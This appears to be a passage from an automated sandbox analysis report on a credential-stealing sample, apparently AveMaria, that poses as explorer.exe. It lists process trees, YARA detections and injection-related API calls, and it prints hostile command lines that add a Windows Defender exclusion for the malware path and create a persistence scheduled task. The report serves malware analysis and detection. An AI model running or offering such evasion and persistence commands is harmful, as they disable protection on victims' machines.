Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: explorer.exePID: 1248, Parent PID: 904

General

Target ID:	29
Start time:	08:14:04
Start date:	23/09/2022
Path:	C:\Users\user\AppData\Roaming\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\explorer.exe
Imagebase:	0x1330000
File size:	974336 bytes
MD5 hash:	87B246B26208A9831A4372664C518C2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Target ID:	30
Start time:	08:14:08
Start date:	23/09/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Imagebase:	0x21cc0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: schtasks.exePID: 2448, Parent PID: 1248

General

Target ID:	32
Start time:	08:14:09
Start date:	23/09/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Imagebase:	0x560000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	34
Start time:	08:14:13
Start date:	23/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x1020000
File size:	261944 bytes
MD5 hash:	7FB523211C53D4AB3213874451A928AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	35
Start time:	08:14:22
Start date:	23/09/2022
Path:	C:\Windows\System32\verclsid.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Imagebase:	0xffa70000
File size:	11776 bytes
MD5 hash:	3796AE13F680D9239210513EDA590E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	36
Start time:	08:14:23
Start date:	23/09/2022
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Imagebase:	0xfff60000
File size:	193536 bytes
MD5 hash:	B32189BDFF6E577A92BAA61AD49264E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Function 000007FF00250788 Relevance: 1.1, Instructions: 1078COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.928251618.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff00250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae40f64f13df746507544156c56a46420333e581b566af86170658d238df600
Instruction ID: 533ea076a48ea7901a4660b923df1993a5aab62ad5b4b981fb065bb8ee9b5051
Opcode Fuzzy Hash: 9ae40f64f13df746507544156c56a46420333e581b566af86170658d238df600
Instruction Fuzzy Hash: CB11E61061EAC70FEB826B38485A7B5BFC0DF1A311F5800FAD449CB0A3DD68A9468741

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 2360, Parent PID: 264COMMON

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Executed Functions

Function 001900C8 Relevance: 9.6, Strings: 7, Instructions: 826
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TNGp, xrefs: 00190B45
TNGp, xrefs: 001909A7
TNGp, xrefs: 001911C9
TNGp, xrefs: 00190C7F
TNGp, xrefs: 00191029
TNGp, xrefs: 00190D9F
TNGp, xrefs: 00190EF2

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID: TNGp$TNGp$TNGp$TNGp$TNGp$TNGp$TNGp
API String ID: 0-248060045
Opcode ID: fe84f475da5681905f32844298e7de6dafd9d1a09d754affad682717347b5d33
Instruction ID: 4636582d60f23e2e54e01947f27eefc1947d06dda914fb474fa7a2fdf435e768
Opcode Fuzzy Hash: fe84f475da5681905f32844298e7de6dafd9d1a09d754affad682717347b5d33
Instruction Fuzzy Hash: 0A82E434A10218CFD724DF64C895FA9B7B1BF8A304F1185E9E949AB360EB70AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001907EE Relevance: 9.6, Strings: 7, Instructions: 823
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TNGp, xrefs: 00190B45
TNGp, xrefs: 001909A7
TNGp, xrefs: 001911C9
TNGp, xrefs: 00190C7F
TNGp, xrefs: 00191029
TNGp, xrefs: 00190D9F
TNGp, xrefs: 00190EF2

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID: TNGp$TNGp$TNGp$TNGp$TNGp$TNGp$TNGp
API String ID: 0-248060045
Opcode ID: 39d4baeeff642c5a4bd9a9bbaa62824fbc89902297c7d1a76ae5b2538412d195
Instruction ID: c08df71240e4544b41dd22338d8967d58fb819fd55159a1d4da07daef01802b9
Opcode Fuzzy Hash: 39d4baeeff642c5a4bd9a9bbaa62824fbc89902297c7d1a76ae5b2538412d195
Instruction Fuzzy Hash: AB82E434A10218CFD724DF64C895FA9B7B1BF8A304F1185E9E949AB360EB70AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00197650 Relevance: 2.2, Strings: 1, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UUUU, xrefs: 00197B22

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID: UUUU
API String ID: 0-1798160573
Opcode ID: da54185f7b526b5bd2646ac424fc2ea50a04b414102f4e9eb4e98e0f25ac1d6e
Instruction ID: fad434537f230aada879ec3e0b6975e18d0cda5c01b9d7d9309aa0eba8078be1
Opcode Fuzzy Hash: da54185f7b526b5bd2646ac424fc2ea50a04b414102f4e9eb4e98e0f25ac1d6e
Instruction Fuzzy Hash: 27A2D775A04228CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0131A760 Relevance: .3, Instructions: 281
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.963503963.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1310000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcee503994ac0fe330af4a3a3901370939f10c68988a89dae2c9064644d305cd
Instruction ID: cad54b3154c2ccad9742a305e8632c24bebd592cb77f9e6fae049037be62bd2e
Opcode Fuzzy Hash: fcee503994ac0fe330af4a3a3901370939f10c68988a89dae2c9064644d305cd
Instruction Fuzzy Hash: 67C12774E05258CFDB08EFA9D940AAEBBB6FB89304F108469D809A7358DB345A46CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01317AF0 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01317DB7

Memory Dump Source

Source File: 00000008.00000002.963503963.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1310000_explorer.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c2c36bf84689be76b2a3505ffe3f1ba24d022e976f6ac5128eaf39b59510261e
Instruction ID: afc6a28b171716df5b36fd060ce4d0386b9d7082b38e3d7ae38fbb233958acfa
Opcode Fuzzy Hash: c2c36bf84689be76b2a3505ffe3f1ba24d022e976f6ac5128eaf39b59510261e
Instruction Fuzzy Hash: C7C11070D042698FDF24CFA8C841BEEBBB1BF49308F1495A9D909B7244DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 013176C8 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0131779B

Memory Dump Source

Source File: 00000008.00000002.963503963.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1310000_explorer.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 29e2ea39f04019d9f50db08ea3df901d4bd7cded24e060c8dc75bb95ae5ad1e4
Instruction ID: 936fcdefc108b76e1239987f5a22ef01072e0031d2425e50938fa11ce88c587e
Opcode Fuzzy Hash: 29e2ea39f04019d9f50db08ea3df901d4bd7cded24e060c8dc75bb95ae5ad1e4
Instruction Fuzzy Hash: DF41A9B4D012589FCF04CFA9D984AEEFBF1BB49314F24942AE815B7240D734AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 01317858 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0131790A

Memory Dump Source

Source File: 00000008.00000002.963503963.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1310000_explorer.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 81599e63a73734274d0b9f5ec9bd7db0cd012e66adabfa6c04f6991048f4ed38
Instruction ID: 20a55ebe4c1200d35d8b2bd5a847e703141f429f80acebdc50e8ad9ae197eb2e
Opcode Fuzzy Hash: 81599e63a73734274d0b9f5ec9bd7db0cd012e66adabfa6c04f6991048f4ed38
Instruction Fuzzy Hash: F041B8B8D042589FCF10CFA9D884AEEFBB1FB49314F24942AE815B7240D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 01317570 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0131761A

Memory Dump Source

Source File: 00000008.00000002.963503963.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1310000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c6323345a0d4ee4317037be80930f5ba5e9d0c4d109d3b195a6a8cf0930de301
Instruction ID: bc60a1320cf8a5688710c61ab6a889ad989145769e60cbc96fff4e929c469007
Opcode Fuzzy Hash: c6323345a0d4ee4317037be80930f5ba5e9d0c4d109d3b195a6a8cf0930de301
Instruction Fuzzy Hash: 484199B8D042589FCF14CFA9D884ADEFBB1FB49314F24941AE815B7200D735A905CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01317380 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0131742F

Memory Dump Source

Source File: 00000008.00000002.963503963.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1310000_explorer.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c60bd24f06cf59b4fff1b59554362d05c39c4e353b16cf861932bb81775d9a46
Instruction ID: 00c97ae30f7b00abf0c91175d0a2258ac50353dbf383bd1341a23e6ddff6d8bf
Opcode Fuzzy Hash: c60bd24f06cf59b4fff1b59554362d05c39c4e353b16cf861932bb81775d9a46
Instruction Fuzzy Hash: ED41ADB4D012589FCB14CFA9D884AEEFBF1AF49314F24842AE415B7240DB38A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01317260 Relevance: 1.6, APIs: 1, Instructions: 75
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?), ref: 013172DE

Memory Dump Source

Source File: 00000008.00000002.963503963.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1310000_explorer.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2c28ffbbef6cacd5a851ba7695e8dc59d3ba27c079f9616fd836fcfa55c79d1e
Instruction ID: 645080289a3bc5f2bfb17b5aff122d58778c460a83c2172f6134a97ac66ac1d0
Opcode Fuzzy Hash: 2c28ffbbef6cacd5a851ba7695e8dc59d3ba27c079f9616fd836fcfa55c79d1e
Instruction Fuzzy Hash: FA319BB4D052189FCF14CFA9E885ADEFBB4EB49318F24941AE815B7340DB35A906CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00191392 Relevance: 1.4, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

~, xrefs: 00191395

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 7c98e07ce798a1b63e0bc6d4c0d9faf2d5acd01639586c899ccfac0f9e30bc01
Instruction ID: 9cf403a84afc0f94dc0087650f61a4aea22b307ffc54729d94878613b99e79b3
Opcode Fuzzy Hash: 7c98e07ce798a1b63e0bc6d4c0d9faf2d5acd01639586c899ccfac0f9e30bc01
Instruction Fuzzy Hash: 4871A134A50128CFDB54DF24D894E99B7B1BF8A304F1181E9D449AB361EB30AE85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00191FC0 Relevance: 1.4, Strings: 1, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\-<l, xrefs: 00192036

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID: \-<l
API String ID: 0-2818436665
Opcode ID: 9449dcbdedc3e1b1ec0cac453e0506acc2d6449c55da4695da76582c3e6766be
Instruction ID: 4d954cff0b0215ed279b4d5d3dd510c0c177e759a46a0295033fb6df03ec235b
Opcode Fuzzy Hash: 9449dcbdedc3e1b1ec0cac453e0506acc2d6449c55da4695da76582c3e6766be
Instruction Fuzzy Hash: FF513734E09208EFDF08CFA5D844BEDBBB6AF89300F249029E506B7361CB745945DB50

Uniqueness

Uniqueness Score: -1.00%

Function 058912DD Relevance: 1.3, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J, xrefs: 05891342

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID: J
API String ID: 0-1141589763
Opcode ID: f3a2cf5db065608a2280689f572720e42b6c4405c3cba8d74c975f8d3718fe99
Instruction ID: 445b873a9ec5ab77671443e90fab6c93235d5a488c9bf274f790842839445142
Opcode Fuzzy Hash: f3a2cf5db065608a2280689f572720e42b6c4405c3cba8d74c975f8d3718fe99
Instruction Fuzzy Hash: 55F0E7B499416BCFDBA4DF64CD88BA9B7B1BB44305F0044EAD61DA7291CB341E84CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00190094 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca354f38b51405b4a4c7cbb5b07034b453051bb0ee8b902275a18862a1d590c3
Instruction ID: 26ba6487666a1a8e9256537d7a54c6658c1454db9b569b8d0b1201bc5a7f21a1
Opcode Fuzzy Hash: ca354f38b51405b4a4c7cbb5b07034b453051bb0ee8b902275a18862a1d590c3
Instruction Fuzzy Hash: C5515B74E041199FDB09DFA4D841AEEFBB2FF88304F108869E91567364DB316D51CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001970E7 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2240ce36d0b6fb258ad5c1f8fb96e148f17b761fe3aadaea90f0d5dbfa7bfb1
Instruction ID: dbc3adfa1d73c7e3fe1c5fc171f5c1871ca2da62ef2b0e59106b5446d919585b
Opcode Fuzzy Hash: c2240ce36d0b6fb258ad5c1f8fb96e148f17b761fe3aadaea90f0d5dbfa7bfb1
Instruction Fuzzy Hash: 8D41BD6691E3C14FCB039778ACA52C9BF719F53254F1A01EBC580CB1E3EA284D4AC362

Uniqueness

Uniqueness Score: -1.00%

Function 001904D0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce6c5a3e1a08a63f15f7776335397e34d3ace2eefd5eef26f855770fa79eec6e
Instruction ID: 222a7640659782728de945bbe787315e5a4127b92a456187c81e6e2c7ee9e3a4
Opcode Fuzzy Hash: ce6c5a3e1a08a63f15f7776335397e34d3ace2eefd5eef26f855770fa79eec6e
Instruction Fuzzy Hash: 0E515A74E042199FCB09DFA4D881AEEBBB2FF88300F108869E415673A4DB356D51CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001927DF Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86f4470fe2decf8d9143f8fe2db1e19650ce56933a151785e0942abc725bb6e
Instruction ID: 97b3fea959626be78d0f107b090286703059946c91006ccccb649c6fcbbd6f7e
Opcode Fuzzy Hash: d86f4470fe2decf8d9143f8fe2db1e19650ce56933a151785e0942abc725bb6e
Instruction Fuzzy Hash: 9141F274D09228EFCF18CFE4D880AEDBBBABB49304F219029E519AB251D7345949DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00191650 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 054c05e639de17e452f69feb108990ba894ec9e71771f4bc76d139be628bcda8
Instruction ID: 3275f07aa4fa3d7eee4947b24a2f47d882edb108326ac29bd8247302dc1d25ae
Opcode Fuzzy Hash: 054c05e639de17e452f69feb108990ba894ec9e71771f4bc76d139be628bcda8
Instruction Fuzzy Hash: 4551BF75D002199FDB04DFEAD844ADEBBF2FF88301F14806AD419AB265D7745A86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00192B25 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 662d4c66c91afe1aa314048b07d209a30a5bf39b70d0d7622b513f032d29372c
Instruction ID: 802a3aaefd471746452f36f155245a898a3b0c3b2c534575794dd0a14646def9
Opcode Fuzzy Hash: 662d4c66c91afe1aa314048b07d209a30a5bf39b70d0d7622b513f032d29372c
Instruction Fuzzy Hash: E9412F74E09208DFCF08CFA9C484AEDBBF1BF49300F259126D40AA7216D734A986CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00191CFC Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d152aa62f3a1fa0d9e558457d1c8a924c837c7f3646512ebce4a39e9b619403
Instruction ID: 190a5fab773b1be1b24b192454275bcfa9a723d665978ebd0efda6cac0f7eb44
Opcode Fuzzy Hash: 6d152aa62f3a1fa0d9e558457d1c8a924c837c7f3646512ebce4a39e9b619403
Instruction Fuzzy Hash: 0D41CE74E04209DFDF18DFA4C5846EDBBB2BF89300F214529D819AB355DB359981CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00192883 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b4faed0d7371394589f03a2c38523cffe1546a105c58c2cb6dcfe18f4a915b
Instruction ID: e8f0838322748517d60c8aab041c6957508817a25803b218cebd72737728da92
Opcode Fuzzy Hash: 74b4faed0d7371394589f03a2c38523cffe1546a105c58c2cb6dcfe18f4a915b
Instruction Fuzzy Hash: 0B31E374E09228EFCF18CFE8D4846EDBBF9BB59314F205069E509A7241D7345985DF00

Uniqueness

Uniqueness Score: -1.00%

Function 05896AF0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 051c55167db9659ff6db55066172ad02e6f756463c55b9e38c8f92ce89c7d27a
Instruction ID: bfcfc84ec076a7e77ecc389bfce1838cc53b0c163f0046d60fb101edc0a7b735
Opcode Fuzzy Hash: 051c55167db9659ff6db55066172ad02e6f756463c55b9e38c8f92ce89c7d27a
Instruction Fuzzy Hash: FE313871E05119CBDF08DFAAD8406EEB7F6FB89304F18846AD919F3354EB749A418B90

Uniqueness

Uniqueness Score: -1.00%

Function 001927F1 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed719442991e0de5820ade476e360f5ec03627e2bf03829d892ea7fe2e1e454
Instruction ID: cee44b9cdde01eec5d3be23cd884373f3f3ae4943e80bd7da9a65de19c5338b8
Opcode Fuzzy Hash: 4ed719442991e0de5820ade476e360f5ec03627e2bf03829d892ea7fe2e1e454
Instruction Fuzzy Hash: CC31DF74E09229EFCF18CFE8D8846ECBBB9BB59315F20502AE509A7241D7345985DB00

Uniqueness

Uniqueness Score: -1.00%

Function 05896AE0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb202da9dcca4df62db12d07ab3afa2e74d4f9bce127d6ef272e18eab55afb8f
Instruction ID: f1c3ba34abb2888c1f2c30fa7c9e3760e65769a2e7fbb0e1b53dc12a1896d3b5
Opcode Fuzzy Hash: bb202da9dcca4df62db12d07ab3afa2e74d4f9bce127d6ef272e18eab55afb8f
Instruction Fuzzy Hash: 2D317C71E081098FDB08DFAAD8406EEB7F6FBCA300F148466D919E7354E7749E068B90

Uniqueness

Uniqueness Score: -1.00%

Function 0019163F Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ae427be25e01f6cc70f552350c50ce64122013d07b13e48a30dcd28fa4deb5
Instruction ID: bb5bf1cfdf9e59fda92f0dec0716890b3c9930f3d96a335550534c68d0f84e5f
Opcode Fuzzy Hash: 92ae427be25e01f6cc70f552350c50ce64122013d07b13e48a30dcd28fa4deb5
Instruction Fuzzy Hash: 4D310675E046199FDB08CFEAD8446DDBBF2AF88300F14C52AD408AB364E7745985CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05896159 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.976291718.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5890000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c23b63d78c83e29554c60dd8226d6a197cd81d3c83cfd852ef07790965e0f2da
Instruction ID: 0f212335cba496ee832bdb93a1e72c280c429a21df4780f1d31961f68d89fc2a
Opcode Fuzzy Hash: c23b63d78c83e29554c60dd8226d6a197cd81d3c83cfd852ef07790965e0f2da
Instruction Fuzzy Hash: 9E311474E002189FDF09DFA9C8416EEBBB2FF89304F11802AE505A7360EB355A52CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00191F00 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960293876.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c2a216d8a8d1697867b33adc53d5acaeb9e572560340cbe9629306f352dea72
Instruction ID: 052d7c995f8515b27f10d7a59871da8c71fab441d9ec1c5f956c437c038301c5
Opcode Fuzzy Hash: 8c2a216d8a8d1697867b33adc53d5acaeb9e572560340cbe9629306f352dea72
Instruction Fuzzy Hash: 5C31A0B4D0820AEFCB04DFA4D9805EEBBF5AB49305F2091AAD909E7315E7345A85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0013D174 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.960207935.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
